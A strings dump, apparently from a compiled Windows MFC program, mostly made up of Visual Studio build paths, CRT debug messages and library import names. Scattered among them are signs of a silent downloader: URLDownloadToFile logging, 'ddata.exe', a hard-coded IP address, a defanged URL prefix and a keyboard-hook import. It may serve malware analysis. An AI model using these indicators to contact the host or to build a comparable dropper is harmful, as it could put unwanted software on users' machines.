f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp

a %hs object at $%p, %u bytes long

an invalid object at $%p, %u bytes long

faulted while dumping object at $%p, %u bytes long

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp

m_bz.hTask =

m_bz.hResource =

m_bz.lpszTemplate =

m_bz.hInstance =

m_bz.lCustData =

m_bz.lpszCaption =

m_bz.hWndOwner =

m_bz.dwFlags =

m_bz.cbStruct =

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\list_o.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\_tolower.c

f:\dd\vctools\crt_bld\self_x86\crt\src\locale0.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmutex.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\xmbtowc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\streambuf

f:\dd\vctools\crt_bld\self_x86\crt\src\xlocale

%s(%d) :

%s_%0x

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atlbase.cpp

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c

Client hook allocation failure at file %hs line %d.

Memory allocated at %hs(%d).

Client hook re-allocation failure at file %hs line %d.

HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory after end of heap buffer.

HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.

CRT detected that the application wrote to memory before start of heap buffer.

CRT detected that the application wrote to a heap buffer that was freed.

crt block at 0x%p, subtype %x, %Iu bytes long.

client block at 0x%p, subtype %x, %Iu bytes long.

%hs(%d) :

#File Error#(%d) :

Data: <%s> %s

f:\dd\vctools\crt_bld\self_x86\crt\src\onexit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setvbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\threadex.c

_CrtDbgReport: String too long or IO Error

Debug %s!

Program: %s%s%s%s%s%s%s%s%s%s%s%s

f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c

%s(%d) : %s

_CrtDbgReport: String too long or Invalid characters in String

f:\dd\vctools\crt_bld\self_x86\crt\src\_file.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initctyp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\setlocal.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdenvp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stdargv.c

f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c

This is an unsupported way to load Visual C   DLLs. You need to modify your application to build with a manifest.

- Attempt to initialize the CRT more than once.

- CRT not initialized

Please contact the application's support team for more information.

- floating point support not loaded

f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c

GetProcessWindowStation

f:\dd\vctools\crt_bld\self_x86\crt\src\output.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\drive.c

ADVAPI32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\read.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c

USER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\convrtcp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c

portuguese-brazilian

operator

Run-Time Check Failure #%d - %s

%s%s%s%s

%s%s%p%s%ld%s%d%s

user32.dll

f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c

MSPDB80.DLL

RegCloseKey

RegOpenKeyExA

f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp

GetProcessHeap

KERNEL32.dll

SetWindowsHookExW

GetKeyState

CreateDialogIndirectParamW

UnhookWindowsHookEx

USER32.dll

RegOpenKeyExW

RegEnumKeyExW

RegQueryInfoKeyW

RegDeleteKeyW

RegCreateKeyW

RegEnumKeyW

RegOpenKeyW

RegCreateKeyExW

ADVAPI32.dll

ole32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

OLEAUT32.dll

UrlUnescapeW

SHLWAPI.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

COMDLG32.dll

WINSPOOL.DRV

oledlg.dll

URLDownloadToFileW

urlmon.dll

dbghelp.dll

IPHLPAPI.DLL

RPCRT4.dll

OLEACC.dll

InternetCrackUrlW

InternetCanonicalizeUrlW

InternetOpenUrlW

HttpOpenRequestW

HttpSendRequestW

HttpQueryInfoW

WININET.dll

GetCPInfo

GetConsoleOutputCP

.?AVCCmdTarget@@

MaxCore.cpp

MaxCoreDlg.cpp

.?AVCWebBrowser2@@

.?AVExecuteBase@@

.?AVExecuteFacade@@

Idispimp.cpp

.PAVCFileException@@

.PAVCInternetException@@

.PAVexception@std@@

Text.cpp

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCException@@

.PAVCObject@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCOleException@@

.?AVCNotSupportedException@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCArchiveException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCOleDispatchException@@

zcÁ

220.233.187.16

domain.com

79_6826_15418

Y.Uii

I=ym.aAJ

?B1ul%S.

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xutility

AtlThrow: hr = 0x%x

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlsimpstr.h

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator *

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\vector

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator  =

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator *

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator *

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator  =

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator  =

std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >::operator []

hWarning: implicit LoadString(%u) failed

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

Windows

IsWindowsServer,

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator *

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator  =

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator  =

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator *

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator   

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\ostream

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator *

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator   

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator ==

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xtree

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator *

std::vector<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator []

invalid operator<

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::_Inc

ExtractIcon.cpp

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator   

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\list

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator --

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator --

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator *

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator   

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator  =

std::_Vector_const_iterator<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\regex

_std::_Vector_const_iterator<char,class std::allocator<char> >::operator *

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator *

Bstd::vector<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator []

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\algorithm

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::_Inc

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlcomcli.h

helpJavaScript.cpp

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator  =

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator *

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator   

std::vector<wchar_t,class std::allocator<wchar_t> >::operator []

E_OUTOFMEMORY FAIL URLDownloadToFile

INET_E_DOWNLOAD_FAILURE FAIL URLDownloadToFile

SUCCEEDED URLDownloadToFile

SUCCEEDED default URLDownloadToFile

default URLDownloadToFile

hXXps://

std::vector<class argument,class std::allocator<class argument> >::operator []

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator  =

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator *

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator   

ddata.exe

start.gif

std::vector<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator []

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator *

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator   

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator  =

"sentry.interfaces.Message": {

std::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator *

%s%s%s

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::_Inc

SELECT * FROM Win32_OperatingSystem

_hd_%S

0mb_%S

Windows

CACHE_S_FORMATETC_NOTSUPPORTED

CO_E_SERVER_EXEC_FAILURE

MK_E_INTERMEDIATEINTERFACENOTSUPPORTED

OLE_E_ADVISENOTSUPPORTED

REGDB_E_KEYMISSING

VCACHE_E_FIRST...CACHE_E_LAST

CACHE_S_FIRST...CACHE_S_LAST

CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST

CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST

CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST

CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST

CLIPBRD_E_FIRST...CLIPBRD_E_LAST

CLIPBRD_S_FIRST...CLIPBRD_S_LAST

CONVERT10_E_FIRST...CONVERT10_E_LAST

CONVERT10_S_FIRST...CONVERT10_S_LAST

CO_E_FIRST...CO_E_LAST

CO_S_FIRST...CO_S_LAST

DATA_E_FIRST...DATA_E_LAST

DATA_S_FIRST...DATA_S_LAST

DRAGDROP_E_FIRST...DRAGDROP_E_LAST

DRAGDROP_S_FIRST...DRAGDROP_S_LAST

ENUM_E_FIRST...ENUM_E_LAST

ENUM_S_FIRST...ENUM_S_LAST

INPLACE_E_FIRST...INPLACE_E_LAST

INPLACE_S_FIRST...INPLACE_S_LAST

MARSHAL_E_FIRST...MARSHAL_E_LAST

MARSHAL_S_FIRST...MARSHAL_S_LAST

MK_E_FIRST...MK_E_LAST

MK_S_FIRST...MK_S_LAST

OLEOBJ_E_FIRST...OLEOBJ_E_LAST

OLEOBJ_S_FIRST...OLEOBJ_S_LAST

OLE_E_FIRST...OLE_E_LAST

OLE_S_FIRST...OLE_S_LAST

REGDB_E_FIRST...REGDB_E_LAST

REGDB_S_FIRST...REGDB_S_LAST

VIEW_E_FIRST...VIEW_E_LAST

VIEW_S_FIRST...VIEW_S_LAST

FACILITY_WINDOWS

severity: %s, facility: %s ($lX)

range: %s ($lX)

%s ($lX)

Warning: constructing COleException, scode = %s.

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h

G%s (%s:%d)

%s (%s:%d)

If:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

ERROR: Dialog named '%s' must have the child style.

ERROR: Dialog named '%s' must be invisible.

ERROR: Cannot find dialog template named '%s'.

Can't register window class named %s

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

accKeyboardShortcut

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h

commctrl_DragListMsg

ntdll.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Error: failed to execute DDE command '%s'.

Warning: DDE command '%s' ignored because window is disabled.

pMRU: open file (%d) '%s'.

Binding entry %d failed. Status: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h

GetData failed - HRESULT = 0x%X

m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)

CLSID\%s

Interface\%s

mfcm90ud.dll

QueryInterface(%s) failed

QueryInterface(%s) succeeded

Kcomctl32.dll

Kcomdlg32.dll

Kshell32.dll

connecting to socket address '%s'

resolved name for %s!

resolving name for %s

Warning: destroying an open %s with handle %8.8X

Warning: Disconnecting %s handle %8.8X in context %8.8X at destruction.

KHTTP/1.0

WININET.DLL

Warning: could not get volume information '%s'.

Warning: could not parse the path '%s'. Path is too long.

Warning: could not parse the path '%s'.

CFile exception: %hs, File %s, OS error information = %ld.

AppMsg

WinMsg

CmdRouting

%s: hwnd=0xX, msg = 0xX (0xX, 0xX)

%s: hwnd=0xX, msg = %hs (0xX, 0xX)

%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d

%s: Execute '%s'.

0xx

Lf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

Warning: OleInitialize returned scode = %s.

mscoree.dll

nf:\dd\vctools\crt_bld\self_x86\crt\src\xstring

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp

%S(%d) :

ppCategory && pfnCrtDbgReport

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h

f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c

mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE

wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)

wcscpy_s(szExeName, 260, L"<program name unknown>")

__crtMessageWindowW

f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c

_CrtCheckMemory()

_CrtIsValidHeapPointer(pUserData)

_CrtSetDbgFlag

(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)

_CrtMemCheckpoint

f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c

